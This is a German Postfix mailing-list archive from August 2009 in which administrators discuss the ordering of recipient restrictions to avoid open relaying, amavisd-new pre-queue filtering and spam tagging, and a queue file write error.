[Postfixbuch-users] Reihenfolge von Black-/Whitelisting und reject_unauth_destination in smtpd_recipient_restrictions In-Reply-To: References: Message-ID: <20090810074807.GF27755@charite.de> * Michael Grimm : > und insbesondere um die Reihenfolge der einzelnen Tests, von oben nach unten :) > smtpd_recipient_restrictions = > check_sender_access pcre:/usr/local/etc/postfix/access_sender, reject_non_fqdn_sender, > reject_non_fqdn_recipient, > reject_unknown_sender_domain, > reject_unknown_recipient_domain, > permit_sasl_authenticated, > permit_mynetworks, hier muss reject_unauth_destination hin > reject_unlisted_recipient, > warn_if_reject reject_unauth_pipelining, > warn_if_reject reject_invalid_helo_hostname, > check_policy_service inet:127.0.0.1:10023, > warn_if_reject reject_rbl_client ix.dnsbl.manitu.net, > warn_if_reject reject_rbl_client sbl.spamhaus.org, > warn_if_reject reject_rbl_client xbl.spamhaus.org, > warn_if_reject reject_rbl_client cbl.abuseat.org, zusammenfassen zu "reject_rbl_client zen.spamhaus.org" > warn_if_reject reject_rhsbl_client blackhole.securitysage.com, reject_unverified_recipient, > permit_mx_backup, Wer braucht denn sowas? > reject_unauth_destination, Bissel weit unten. > permit > > In check_sender_access geht es um Einträge à la: > > /^junkmail at unwanted\.tld/ HOLD > > (HOLD solange, bis ich mir sicher bin, mit einem REJECT > keinen Schaden anzurichten; sind unerwünschte und von > anderen abonnierte Newsletter) > > Mein Verständnisproblem liegt nun in der späten Überprüfung > reject_unauth_destination und dem empfohlenen White-/Black- > Listing ganz zu Beginn der smtpd_recipient_restrictions. Sollte > dieser Relaycheck nicht relativ weit vorne erfolgen? Öffnete ich > nicht meinen Server hinsichtlich Relaying, wenn ich bspw. in > check_sender_access ein OK vergäbe? Hmm. So ist es > Hintergrund meiner Fragen ist: Ich möchte gerne ein paar > Absenderadressen zur Sicherheit hinsichtlich gerade getesteter > RBL checks whitelisten. > > Wo ist mein Denkfehler? > > Schon einmal vielen Dank, > Michael > > > > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listen.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From F.Guenther at t-systems.com Mon Aug 10 10:33:26 2009 From: F.Guenther at t-systems.com (F.Guenther at t-systems.com) Date: Mon, 10 Aug 2009 10:33:26 +0200 Subject: [Postfixbuch-users] Post und Pre Queue Umschaltung und Tagging Message-ID: <410895869A205548A19FE0746861331C07D9B009@S4DE9JSAAIG.ost.t-com.de> Hallo, Ich möchte meinen Mailserver (Postfix amavis-new clamav razor laufen den log nach ohne Fehler).. neu aufsetzen (ubuntu 8.04 LTS) und dazu Prequeue nutzen. Allerdings nur für mails mit Viren. Diese sollen nicht angenommen werden. Spam wird ja auch am Anfang untersucht, aber Mails mit Spam möchte ich nur taggen! Wenn ich von einem anderen Rechner im Netz eine Testmail sende (auf dem Mailserver habe ich ein alias Eintrag zu diesem Account hier) kann ich auch sehen, wie eine Virentestmail (von amavis-new) an den Sender zurück geschickt wird. Dann keine Weiterleitung. Eine Spammail wird auch untersucht, aber das taggen klappt nicht. Sie wird zugestellt aber ungetaggt. Hier meine Dateien: Main.cf smtpd_proxy_filter=[localhost]:10024 content_filter = smtp-amavis:[127.0.0.1]:10024 receive_override_options = no_address_mappings Master.cf smtp-amavis unix - - n - 10 smtp -o smtp_data_done_timeout=1800 -o smtp_send_xforward_command=yes -o disable_mime_output_conversion=yes -o smtp_generic_maps= 127.0.0.1:10025 inet n - n - - smtpd -o content_filter= -o smtpd_proxy_filter= -o smtpd_authorized_xforward_hosts=127.0.0.0/8 -o local_recipient_maps= -o relay_recipient_maps= -o smtpd_delay_reject=no -o smtpd_client_restrictions= -o smtpd_helo_restrictions= -o smtpd_sender_restrictions= -o smtpd_recipient_restrictions=permit_mynetworks,reject -o smtpd_data_restrictions=reject_unauth_pipelining -o smtpd_end_of_data_restrictions= -o mynetworks=127.0.0.0/8 -o smtpd_error_sleep_time=0 -o smtpd_soft_error_limit=1001 -o smtpd_hard_error_limit=1000 -o receive_override_options=no_header_body_checks,no_unknown_recipient_checks,no_milters 50-user (habe nur hier meine Einstellungen rein geschrieben) @local_domains_acl = qw(.); @local_domains_maps = ( [qw(.hier die lokalen Domänen des Servers)] ); #$log_level = 2; $log_level = 3; $syslog_priority = 'debug'; $sa_tag_level_deflt = -9999; $sa_tag2_level_deflt = -999; $sa_kill_level_deflt = 999; # triggers spam evasive actions 6.31 $sa_dsn_cutoff_level = 999; $final_virus_destiny = D_REJECT; # (data not lost, see virus quarantine) $final_banned_destiny = D_REJECT; # D_REJECT when front-end MTA #$final_spam_destiny = D_REJECT; #$final_bad_header_destiny = D_PASS; # False-positive prone (for spam) $virus_quarantine_to = undef; $banned_quarantine_to = undef; $spam_quarantine_to = undef; $bad_header_quarantine_to = undef; Nun meine Fragen: 1. Wenn mein Rechner im Betrieb mit dem Zerlegen der Mails zeitlich nicht klar kommt, muss ich wieder zum Postqueue zurück. Ist das wirklich die einzige Änderung ? content_filter=smtp-amavis:[127.0.0.1]:10024 #smtpd_proxy_filter=[localhost]:10024 2. Was muss ich ändern um Spam erfolgreich zu taggen? 3. Für Vorschläge bzgl. Änderungen in main.cf master.cf bin ich dankbar. Mit freundlichen Grüßen Frank From cite+postfix-buch at incertum.net Mon Aug 10 13:49:19 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Mon, 10 Aug 2009 13:49:19 +0200 Subject: [Postfixbuch-users] Post und Pre Queue Umschaltung und Tagging In-Reply-To: <410895869A205548A19FE0746861331C07D9B009@S4DE9JSAAIG.ost.t-com.de> References: <410895869A205548A19FE0746861331C07D9B009@S4DE9JSAAIG.ost.t-com.de> Message-ID: <20090810114919.GA29820@mail.incertum.net> * F.Guenther at t-systems.com: > Ich möchte meinen Mailserver (Postfix amavis-new clamav razor > laufen den log nach ohne Fehler).. neu aufsetzen (ubuntu 8.04 LTS) > und dazu Prequeue nutzen. Allerdings nur für mails mit Viren. Diese > sollen nicht angenommen werden. Spam wird ja auch am Anfang > untersucht, aber Mails mit Spam möchte ich nur taggen! Wenn ich von > einem anderen Rechner im Netz eine Testmail sende (auf dem > Mailserver habe ich ein alias Eintrag zu diesem Account hier) kann > ich auch sehen, wie eine Virentestmail (von amavis-new) an den > Sender zurück geschickt wird. Dann keine Weiterleitung. Eine > Spammail wird auch untersucht, aber das taggen klappt nicht. Sie > wird zugestellt aber ungetaggt. Du benötigst dazu auf jeden Fall mehr als eine Policy-Bank: Eine, die Du im smtpd_proxy_filter ansteuerst und die nicht scannt und eine, die Du im content_filter ansteuerst und die nur Spam taggt. Das bedeutet für Dich dann halt, daß Du alleine für dieses Setup schonmal drei smtpd-Konfigurationen hast: 1. Den annehmenden smtpd, der einen smtpd_proxy_filter verwendet. 2. Den smtpd, an den amavisd-new nach dem Virencheck wieder einliefert und der einen content_filter gesetzt hat. 3. Einen dritten smtpd, der die getaggte Mail wieder annimmt und zustellt. > Hier meine Dateien: > smtpd_proxy_filter=[localhost]:10024 > content_filter = smtp-amavis:[127.0.0.1]:10024 > receive_override_options = no_address_mappings Das sind eigentlich die Sachen, die ich _so_ nicht in die main.cf schreiben würde. Entweder Du definierst in der main.cf sowas wie frontentd_smtpd_proxy_filter = 127.0.0.1:100024 und trägst in der master.cf dann ein: smtp ...... smtpd -o smtpd_proxy_filter=$frontentd_smtpd_proxy_filter oder schreibst es halt direkt in die master.cf rein. Analog für die anderen Parameter. > 50-user (habe nur hier meine Einstellungen rein geschrieben) > @local_domains_acl = qw(.); > @local_domains_maps = ( [qw(.hier die lokalen Domänen des Servers)] ); > #$log_level = 2; > $log_level = 3; > $syslog_priority = 'debug'; > > $sa_tag_level_deflt = -9999; $sa_tag_level_deflt = undef; > $sa_tag2_level_deflt = -999; > $sa_kill_level_deflt = 999; # triggers spam evasive actions 6.31 > $sa_dsn_cutoff_level = 999; Die drei würde ich ehrlich gesagt nicht anfassen. > $final_virus_destiny = D_REJECT; # (data not lost, see virus quarantine) > $final_banned_destiny = D_REJECT; # D_REJECT when front-end MTA > #$final_spam_destiny = D_REJECT; > #$final_bad_header_destiny = D_PASS; # False-positive prone (for spam) > > $virus_quarantine_to = undef; > $banned_quarantine_to = undef; > $spam_quarantine_to = undef; > $bad_header_quarantine_to = undef; Diese Einstellungen solltest Du dann pro policy_bank vornehmen. > Nun meine Fragen: > 1. Wenn mein Rechner im Betrieb mit dem Zerlegen der Mails zeitlich nicht klar kommt, muss ich wieder zum Postqueue zurück. > Ist das wirklich die einzige Änderung ? Jein. Natürlich kann man, gerade auf modernen Postfix-Versionen, die mit dem "stress"-Patch gebaut wurden, sowas auch automatisiert machen, also sprich, auf einen content_filter (mit eigener policy_bank) zurückfallen, wenn alle smtpd-Slots belegt sind. Nur muß dann zum Einen die Konfiguration dieses content_filters entsprechend angepasst sein (Quarantäne, kein REJECT etc.), und zum anderen heißt "alle smtpd-Dienste belegt) nicht unbedingt, daß Dein Rechner nicht mit _Scannen_ hinterherkommt. > 2. Was muss ich ändern um Spam erfolgreich zu taggen? http://www.ijs.si/software/amavisd/#faq-spam Bei Debian solltest Du dann in der /etc/amavis/conf.d/15-content_filter_mode noch auskommentieren, daß auch wirklich gescannt wird. > 3. Für Vorschläge bzgl. Änderungen in main.cf master.cf bin ich dankbar. Für Hilfe zu Policy-Banks: http://www.ijs.si/software/amavisd/amavisd-new-docs.html#pbanks http://www.ijs.si/software/amavisd/amavisd-new-docs.html#pbanks-ex Und dann erlaube ich mir, mal auf einen kurzen Eintrag in meinem Blog hinzuweisen, auch, wenn man normalerweise hier keine Werbung für seine eigenen Seiten machen sollte: http://www.incertum.net/archives/378-amavisd-new-und-policy-banks.html http://www.incertum.net/archives/389-amavisd-new-Dedizierte-Policy-in-Abhaengigkeit-von-Headern.html https://listi.jpberlin.de/pipermail/postfixbuch-users/2009-August/050973.html Alles in allem hast Du vor, ein nicht ganz triviales Setup zu verwirkliche, wirst dabei aber garantiert eine Menge lernen ;-) Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #92: Emacs - Esc Meta Alt Control Shift From leo.unglaub at gmail.com Mon Aug 10 14:49:11 2009 From: leo.unglaub at gmail.com (Leo Unglaub) Date: Mon, 10 Aug 2009 14:49:11 +0200 Subject: [Postfixbuch-users] queue file write error Message-ID: Hallo Postfix-Freunde, ich habe heute zum zweiten mal ein E-Mail von meinem eigenen Server mit folgendem Inhalt bekommen: Transcript of session follows. > > Out: 220 mail.e-c-o.at ESMTP Postfix (Debian/GNU) > In: EHLO aphrodite1.ktn.gv.at > Out: 250-mail.e-c-o.at > Out: 250-PIPELINING > Out: 250-SIZE 61457280 > Out: 250-VRFY > Out: 250-ETRN > Out: 250-AUTH LOGIN PLAIN > Out: 250-AUTH=LOGIN PLAIN > Out: 250-ENHANCEDSTATUSCODES > Out: 250-8BITMIME > Out: 250 DSN > In: MAIL FROM: SIZE=1832618 > Out: 250 2.1.0 Ok > In: RCPT TO: > Out: 451 4.3.0 Error: queue file write error > In: DATA > Out: 554 5.5.1 Error: no valid recipients > In: RSET > Out: 250 2.0.0 Ok > In: QUIT > Out: 221 2.0.0 Bye > > Das eigentlich interesannte ist, dass dieses E-Mail aber nicht im Log-File auftaucht. Zu diesem Zeitpunkt habe ich zwar einen anderne log-Eintrag im File, aber der handelt von einem Mail das von der heise.de Blackliste geblockt wurde. Kann mir irgend wer erklären wie ein SMTP-Dialog ablaufen kann ohne dass dieser im log-File angezeigt wird? Vielen Dank Leo -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From cite+postfix-buch at incertum.net Mon Aug 10 14:51:59 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Mon, 10 Aug 2009 14:51:59 +0200 Subject: [Postfixbuch-users] queue file write error In-Reply-To: References: Message-ID: <20090810125159.GB29820@mail.incertum.net> * Leo Unglaub : > ich habe heute zum zweiten mal ein E-Mail von meinem eigenen Server mit > folgendem Inhalt bekommen: > > Transcript of session follows. >> >> Out: 220 mail.e-c-o.at ESMTP Postfix (Debian/GNU) >> In: EHLO aphrodite1.ktn.gv.at >> Out: 250-mail.e-c-o.at >> Out: 250-PIPELINING >> Out: 250-SIZE 61457280 >> Out: 250-VRFY >> Out: 250-ETRN >> Out: 250-AUTH LOGIN PLAIN >> Out: 250-AUTH=LOGIN PLAIN >> Out: 250-ENHANCEDSTATUSCODES >> Out: 250-8BITMIME >> Out: 250 DSN >> In: MAIL FROM: SIZE=1832618 >> Out: 250 2.1.0 Ok >> In: RCPT TO: >> Out: 451 4.3.0 Error: queue file write error >> In: DATA >> Out: 554 5.5.1 Error: no valid recipients >> In: RSET >> Out: 250 2.0.0 Ok >> In: QUIT >> Out: 221 2.0.0 Bye >> >> Das eigentlich interesannte ist, dass dieses E-Mail aber nicht im Log-File > auftaucht. Zu diesem Zeitpunkt habe ich zwar einen anderne log-Eintrag im > File, aber der handelt von einem Mail das von der heise.de Blackliste > geblockt wurde. > > Kann mir irgend wer erklären wie ein SMTP-Dialog ablaufen kann ohne dass > dieser im log-File angezeigt wird? smtpd_proxy_filter? Wenn ja: Timeout bei der Verbindung zu amavisd-new. Da die Mail nie in die Queue gelangt... Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 Every new beginning comes from some other beginning's end. From leo.unglaub at gmail.com Mon Aug 10 15:32:02 2009 From: leo.unglaub at gmail.com (Leo Unglaub) Date: Mon, 10 Aug 2009 15:32:02 +0200 Subject: [Postfixbuch-users] queue file write error In-Reply-To: <20090810125159.GB29820@mail.incertum.net> References: <20090810125159.GB29820@mail.incertum.net> Message-ID: Hallo ! > smtpd_proxy_filter? Wenn ja: Timeout bei der Verbindung zu > amavisd-new. Da die Mail nie in die Queue gelangt... > > > Ciao > Stefan > Ja, auf den Server läuft smtpd_proxy_filter = 127.0.0.1:10024 Wie kann es da zu einem Timeout kommen und nichts in den Logs stehen? Ich habe ja extra so wie im Buch beschrieben die Anzahl der max smtpd und Amavisd-Prozesse syncronisiert damit so etwas nicht passieren kann. Aber bei einem Timeout wurde immerhin mit 554 abgewiesen. Kann ich diesem Log-Vermekt trauen? Denn wie gesagt taucht von diesem E-Mail nichts in den Logs auf, aber es ist von einem wichtigen Kunden. Vielen Dank Leo -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From klaus at tachtler.net Mon Aug 10 15:26:56 2009 From: klaus at tachtler.net (Klaus Tachtler) Date: Mon, 10 Aug 2009 15:26:56 +0200 Subject: [Postfixbuch-users] queue file write error In-Reply-To: <20090810125159.GB29820@mail.incertum.net> References: <20090810125159.GB29820@mail.incertum.net> Message-ID: <20090810152656.x7ro5acjoksksco8@buero.tachtler.net> Hallo Zusammen, >>> Out: 451 4.3.0 Error: queue file write error diese Fehlermeldung taucht z.B. auch auf, wenn der AMaViS auf z.B. Port 10024 oder den Port auf den er bei Dir horcht nicht erreichbar ist. Grüße Klaus. -- ---------------------------------------- e-Mail : klaus at tachtler.net Homepage: http://www.tachtler.net ---------------------------------------- From trashcan at odo.in-berlin.de Mon Aug 10 17:37:12 2009 From: trashcan at odo.in-berlin.de (Michael Grimm) Date: Mon, 10 Aug 2009 17:37:12 +0200 Subject: [Postfixbuch-users] Reihenfolge von Black-/Whitelisting und reject_unauth_destination in smtpd_recipient_restrictions In-Reply-To: <200908091907.41413.p.heinlein@heinlein-support.de> References: <200908091907.41413.p.heinlein@heinlein-support.de> Message-ID: Hallo - Peer Heinlein schrieb: > Am Sonntag, 9. August 2009 schrieb Michael Grimm: >> In check_sender_access geht es um Einträge à la: >> >> /^junkmail at unwanted\.tld/ HOLD >> >> (HOLD solange, bis ich mir sicher bin, mit einem REJECT keinen >> Schaden >> anzurichten; sind unerwünschte und von anderen abonnierte >> Newsletter) > > Naja, da Du ja einzelne spezielle Mailadressen sperrst dürfte das > Risiko aus > Versehen jemanden zu sperren wohl eher sehr gering sein. Aus > irgendeinem > Grund willst Du ja diese Absender sperren, das sind ja dann wohl nicht > irgendwelche Adressen. Nun. Ich habe das etwas vereinfacht dargestellt. Unter "junkmail" und "unwanted" habe ich eigentlich etwas kompliziertere Regex im Einsatz, die somit nicht eine einzelne, sondern ein paar verschiedene Absenderadressen zusammnfassen. Ich mache das mit dem HOLD nur solange, bis ich von der Fehlerfreiheit der Regex überzeugt bin, danach kommt ein REJECT dort hin. >> Listing ganz zu Beginn der smtpd_recipient_restrictions. Sollte >> dieser >> Relaycheck nicht relativ weit vorne erfolgen? Öffnete ich nicht >> meinen >> Server hinsichtlich Relaying, wenn ich bspw. in check_sender_access >> ein OK >> vergäbe? Hmm. > > Wenn Du ein OK in den sender_access_vergibst dann ja. Ist irgendwo > im Buch > auch erwähnt: HELO und SENDER nicht nicht grundsätzlich erstmal nicht > geeignet um ein Whitelisting (!) darauf zu machen. Ok. Dann werde ich auf check_recipient_access für mein Whitelisting von ausgewählten lokalen Adressen ausweichen, die keinen RBL-Checks zugeführt werden sollen. Und in dieser Tabelle dann auch noch ... > Was Du jedoch gefahrlos machen kannst ist, daß Du dort ein > "permit_auth_destination" vergibst. Denn in den access-Map kannst Du > prinzipiell alle Restrictions aufführen (das ist im Buch leider > nicht so > deutlich erklärt). > > Statt eines OK (=Nimm die Mail an, egal wohin) kannst Du also ein > "permit_auth_destination (=nimm die Mail an wenn an uns) nutzen. ... einfügen. Danke für diesen Hinweis. Trotzdem werde ich zur Sicherheit den Relaycheck weiter nach vorne verfrachten. Schönen Dank, Michael From trashcan at odo.in-berlin.de Mon Aug 10 17:38:34 2009 From: trashcan at odo.in-berlin.de (Michael Grimm) Date: Mon, 10 Aug 2009 17:38:34 +0200 Subject: [Postfixbuch-users] Reihenfolge von Black-/Whitelisting undreject_unauth_destination in smtpd_recipient_restrictions In-Reply-To: <007901ca1915$0cbcae20$0565a8c0@uwe> References: <007901ca1915$0cbcae20$0565a8c0@uwe> Message-ID: Uwe Driessen schrieb: > On Behalf Of Michael Grimm >> Mein Verständnisproblem liegt nun in der späten Überprüfung >> reject_unauth_destination und dem empfohlenen White-/Black- Listing >> ganz zu >> Beginn der smtpd_recipient_restrictions. Sollte dieser Relaycheck >> nicht >> relativ weit vorne erfolgen? Öffnete ich nicht meinen Server >> hinsichtlich >> Relaying, wenn ich bspw. in > > Nö eigentlich nicht > >> check_sender_access ein OK vergäbe? Hmm. > > Ein Ok bekommt nur der den ich auf mehrere Arten eindeutig > identifizieren > kann (z.B. feste IP) Hmm. Aber kann man sich denn sicher sein, daß ein derart einmal als Goodguy identifizierter Absender nicht irgendwann einmal zum Badguy mutiert oder sein Server von Spammern übernommen wird? Ok, das war jetzt ein Worst-Case- Scenario. Der Hintergrund meiner Verunsicherung liegt eigentlich darin begründet, daß das Beispiel im Buch den Relaycheck erst ganz zum Schluß macht, und dann auch noch darauf hingewiesen wird, daran nur dann etwas zu ändern, wenn man wisse, was man täte. Als Anfänger blicke ich nicht auf Anhieb durch, welches OK an welcher Stelle fatale Folgen haben könnte. Wäre es dann nicht besser, den Relaycheck gleich zu Beginn nach den Checks auf falsche Header und lokale Recipients vorzuschlagen? Oder kann ich mir damit dann ein anderes Bein stellen, das ich als Anfänger jetzt übersehe? Das soll jetzt bitte nicht als Kritik am Buch mißverstanden werden, ich wollte nur die Gründe für meine Nachfrage schildern, so quasi als Feedback eines Newbies. >> Hintergrund meiner Fragen ist: Ich möchte gerne ein paar >> Absenderadressen >> zur Sicherheit hinsichtlich gerade getesteter RBL checks whitelisten. > > Und wo ist das Problem? kennst du den Server, weist du das dieser > Server für > dich sicher ist, willst du dessen Mails haben dann bleibt dir kein > anderer > Weg wie diesen vor den RBL's mit OK anzunehmen. Wie gerade beschrieben. Ja, derzeit kann ich diesen Servern vertrauen, aber auch in Zukunft? Ich kann meinen Server nicht rund um die Uhr überwachen; vielleicht bin ich ja auch nur etwas paranoid ;-) Ich werde also sicherheitshalber den Relaycheck vor dem Whitelisting durchführen. > ( da deine RBL's aber alle nur mit warn_if_reject laufen werden > diese Server > eh nicht abgelehnt) Ja, das dient derzeit nur dem Austesten, wer was ablehnt und dem Kennenlernen. Schönen Dank, Michael From trashcan at odo.in-berlin.de Mon Aug 10 17:56:05 2009 From: trashcan at odo.in-berlin.de (Michael Grimm) Date: Mon, 10 Aug 2009 17:56:05 +0200 Subject: [Postfixbuch-users] Reihenfolge von Black-/Whitelisting und reject_unauth_destination in smtpd_recipient_restrictions In-Reply-To: <20090810074807.GF27755@charite.de> References: <20090810074807.GF27755@charite.de> Message-ID: <3B655219-E4E7-4361-875E-D4C39B175898@odo.in-berlin.de> Hallo - Ralf Hildebrandt schrieb: > * Michael Grimm : >> und insbesondere um die Reihenfolge der einzelnen Tests, > von oben nach unten :) :-) >> smtpd_recipient_restrictions = >> check_sender_access pcre:/usr/local/etc/postfix/access_sender, >> reject_non_fqdn_sender, >> reject_non_fqdn_recipient, >> reject_unknown_sender_domain, >> reject_unknown_recipient_domain, >> permit_sasl_authenticated, >> permit_mynetworks, > > hier muss reject_unauth_destination hin So sehe ich das auch mittlerweile. Danke für die Bestätigung. >> warn_if_reject reject_rbl_client ix.dnsbl.manitu.net, >> warn_if_reject reject_rbl_client sbl.spamhaus.org, >> warn_if_reject reject_rbl_client xbl.spamhaus.org, >> warn_if_reject reject_rbl_client cbl.abuseat.org, > > zusammenfassen zu "reject_rbl_client zen.spamhaus.org" Ich wollte das pbl.spamhaus.org bewußt ausschließen; habe irgendwie ein Diskussion im Hinterkopf, die sich um eine recht hohe False-positive- Rate drehte. Vielleicht irre ich mich auch nur. >> permit_mx_backup, > > Wer braucht denn sowas? Nun, das fand ich in Kapitel 8.8 ;-) Habe es jetzt noch einmal nachgelesen, und es scheint für mich nur dann von Relevanz zu sein, wenn mein Server als Backup für einen anderen diente. Habe ich wohl mit meinem Scenario (habe selbst MX Backups im DNS) verwechselt. Gegenfrage: Schadet der Eintrag? Potentielle Schwachstelle? >> reject_unauth_destination, > > Bissel weit unten. Jo. Das war der Anlaß meiner Mail. Darf ich daher noch einmal meine neuen angedachten smtpd_recipient_restrictions zur Diskussion stellen: smtpd_recipient_restrictions = # ------------------------------------------------------------------------- # accept RFC role accounts # ------------------------------------------------------------------------- # check_recipient_access pcre:/usr/local/etc/postfix/ access_recipient-rfc, # ------------------------------------------------------------------------- # reject malformed mails # ------------------------------------------------------------------------- reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_unknown_sender_domain, reject_unknown_recipient_domain, reject_unauth_pipelining, reject_invalid_helo_hostname, # ------------------------------------------------------------------------- # accept our users # ------------------------------------------------------------------------- permit_sasl_authenticated, permit_mynetworks, # ------------------------------------------------------------------------- # reject unknown recipients # ------------------------------------------------------------------------- reject_unlisted_recipient, # ------------------------------------------------------------------------- # reject any relaying attempts # ------------------------------------------------------------------------- reject_unauth_destination, reject_unverified_recipient, # ------------------------------------------------------------------------- # white- and blacklisting # ------------------------------------------------------------------------- # check_client_access pcre:/usr/local/etc/postfix/ access_client, # check_helo_access pcre:/usr/local/etc/postfix/access_helo, check_sender_access pcre:/usr/local/etc/postfix/access_sender, check_recipient_access pcre:/usr/local/etc/postfix/ access_recipient, # ------------------------------------------------------------------------- # greylisting # ------------------------------------------------------------------------- check_policy_service inet:127.0.0.1:10023, # ------------------------------------------------------------------------- # RBL # ------------------------------------------------------------------------- reject_rbl_client ix.dnsbl.manitu.net, (weitere RBL) # ------------------------------------------------------------------------- # allow what has passed up to here # ------------------------------------------------------------------------- permit (Die auskommentierten Checks sollen nur verdeutlichen, an welcher Stelle ich sie einsetzte, sollte ich sie einmal benötigen.) Ist das ok so oder Murks? Vielen Dank, Michael From Ralf.Hildebrandt at charite.de Mon Aug 10 18:02:58 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Mon, 10 Aug 2009 18:02:58 +0200 Subject: [Postfixbuch-users] Reihenfolge von Black-/Whitelisting und reject_unauth_destination in smtpd_recipient_restrictions In-Reply-To: <3B655219-E4E7-4361-875E-D4C39B175898@odo.in-berlin.de> References: <20090810074807.GF27755@charite.de> <3B655219-E4E7-4361-875E-D4C39B175898@odo.in-berlin.de> Message-ID: <20090810160258.GY27755@charite.de> * Michael Grimm : > >zusammenfassen zu "reject_rbl_client zen.spamhaus.org" > > Ich wollte das pbl.spamhaus.org bewußt ausschließen; Das geht eleganter über die Returncodes. Welche false positives? -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From trashcan at odo.in-berlin.de Mon Aug 10 18:12:19 2009 From: trashcan at odo.in-berlin.de (Michael Grimm) Date: Mon, 10 Aug 2009 18:12:19 +0200 Subject: [Postfixbuch-users] Reihenfolge von Black-/Whitelisting und reject_unauth_destination in smtpd_recipient_restrictions In-Reply-To: <20090810160258.GY27755@charite.de> References: <20090810074807.GF27755@charite.de> <3B655219-E4E7-4361-875E-D4C39B175898@odo.in-berlin.de> <20090810160258.GY27755@charite.de> Message-ID: Moin, moin - On 10.08.2009, at 18:02, Ralf Hildebrandt wrote: > * Michael Grimm : >>> zusammenfassen zu "reject_rbl_client zen.spamhaus.org" >> >> Ich wollte das pbl.spamhaus.org bewußt ausschließen; > > Das geht eleganter über die Returncodes. Welche false positives? Wie gesagt, mir ist diese Aussage im Zusammenhang einer länglichen Usenet-Diskussion in Erinnerung und es ging um Mailserver mit dynalias et al. Servernamen. Aber, ich kann mich auch irren. Hast Du einen Verweis auf ein Dokument, wo ich mich über diese Returncodes (DNS nehm ich an) schlau machen könnte? Vielen Dank, Michael From Ralf.Hildebrandt at charite.de Mon Aug 10 18:18:15 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Mon, 10 Aug 2009 18:18:15 +0200 Subject: [Postfixbuch-users] Reihenfolge von Black-/Whitelisting und reject_unauth_destination in smtpd_recipient_restrictions In-Reply-To: References: <20090810074807.GF27755@charite.de> <3B655219-E4E7-4361-875E-D4C39B175898@odo.in-berlin.de> <20090810160258.GY27755@charite.de> Message-ID: <20090810161815.GA11947@charite.de> * Michael Grimm : > Hast Du einen Verweis auf ein Dokument, wo ich mich über diese > Returncodes (DNS nehm ich an) schlau machen könnte? http://www.spamhaus.org/zen/ ZEN Return Codes Querying zen.spamhaus.org returns the following result codes for listed entries (see FAQs for a more complete return code table): -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From driessen at fblan.de Mon Aug 10 18:25:02 2009 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 10 Aug 2009 18:25:02 +0200 Subject: [Postfixbuch-users] Reihenfolge von Black-/Whitelistingundreject_unauth_destination in smtpd_recipient_restrictions In-Reply-To: References: <007901ca1915$0cbcae20$0565a8c0@uwe> Message-ID: <002f01ca19d7$1cc0a250$0565a8c0@uwe> On Behalf Of Michael Grimm > Uwe Driessen schrieb: > > On Behalf Of Michael Grimm > > >> Mein Verständnisproblem liegt nun in der späten Überprüfung > >> reject_unauth_destination und dem empfohlenen White-/Black- Listing > >> ganz zu > >> Beginn der smtpd_recipient_restrictions. Sollte dieser Relaycheck > >> nicht > >> relativ weit vorne erfolgen? Öffnete ich nicht meinen Server > >> hinsichtlich > >> Relaying, wenn ich bspw. in > > > > Nö eigentlich nicht > > > >> check_sender_access ein OK vergäbe? Hmm. > > > > Ein Ok bekommt nur der den ich auf mehrere Arten eindeutig > > identifizieren > > kann (z.B. feste IP) > > Hmm. Aber kann man sich denn sicher sein, daß ein derart einmal als > Goodguy > identifizierter Absender nicht irgendwann einmal zum Badguy mutiert > oder sein > Server von Spammern übernommen wird? Ok, das war jetzt ein Worst-Case- > Scenario. Wenn das passiert MUSST du was ändern! > > Der Hintergrund meiner Verunsicherung liegt eigentlich darin > begründet, daß das > Beispiel im Buch den Relaycheck erst ganz zum Schluß macht, und dann > auch noch > darauf hingewiesen wird, daran nur dann etwas zu ändern, wenn man > wisse, was > man täte. Als Anfänger blicke ich nicht auf Anhieb durch, welches OK Mal als Beispiel meine restriktionen mit dem Hinweis die passen genau auf meinem Server und mit großer Wahrscheinlichkeit auf keinem 2. Server. Reingesteckte Arbeit ca. 6 Monate mit täglichem Studium der Log's in der Zwischenzeit schaue ich da nur noch in die logfileauswertung und nue bei Auffälligkeiten in die logfiles. Wann welcher check auf deinem Server kommen muß und welche Restriktionen du einsetzt legst du mit deiner Policy für den Server fest. smtpd_recipient_restrictions = reject_unknown_sender_domain, reject_unknown_recipient_domain, permit_mynetworks, reject_unlisted_recipient, reject_non_fqdn_sender, reject_non_fqdn_recipient, # reject_sender_login_mismatch, reject_unlisted_sender, permit_sasl_authenticated, # reject_unauthenticated_sender_login_mismatch, reject_unauth_destination, check_recipient_access hash:/etc/postfix/adress_maps/kuendigt, check_sender_access pcre:/etc/postfix/checks/sender_checks.pcre, sleep 1, # check_client_access pcre:/etc/postfix/maps/dynip.pcre, # check_helo_access pcre:/etc/postfix/helo_checks, # check_helo_access 